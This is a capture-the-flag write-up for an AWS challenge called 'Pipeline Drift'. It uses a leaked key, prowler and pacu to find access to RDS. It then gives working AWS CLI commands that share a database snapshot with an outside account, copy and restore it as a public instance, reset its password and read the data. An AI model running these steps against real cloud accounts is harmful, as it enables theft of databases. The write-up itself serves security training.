Pipeline Drift

I threw the key into prowler while I tried out other challenges.

Looking at the prowler output it mention there are sensitive environment plaintext credentials. Lets retreive them.

Using pacu, I identified that the leaky user has access to RDS.

There's a stopped rds snapshop, lets try and copy it out to our own account.

To do that, we will need to add our account ID.

aws rds modify-db-snapshot-attribute \
    --db-snapshot-identifier legacy-app-db-snapshot \
    --attribute-name restore \
    --values-to-add [REDACTED] --region us-west-2 --profile pipeline2

aws rds copy-db-snapshot \                                        
    --source-db-snapshot-identifier arn:aws:rds:us-west-2:507880288605:snapshot:legacy-app-db-snapshot \
    --target-db-snapshot-identifier my-restored-copy \
    --region us-west-2

Next we restore the snapshop

aws rds restore-db-instance-from-db-snapshot \
    --db-instance-identifier my-restored-db \
    --db-snapshot-identifier my-restored-copy \
    --db-instance-class db.t3.micro \
    --publicly-accessible \
    --region us-west-2

Change the snapshop master password, as well as whitelist our own IP address so that we are able to access the RDS.

Now, we are able to use mysql to connect to the RDS and retrieve the flag.

PreviousBruteforce Login NextUnreachable

Last updated 4 months ago

Was this helpful?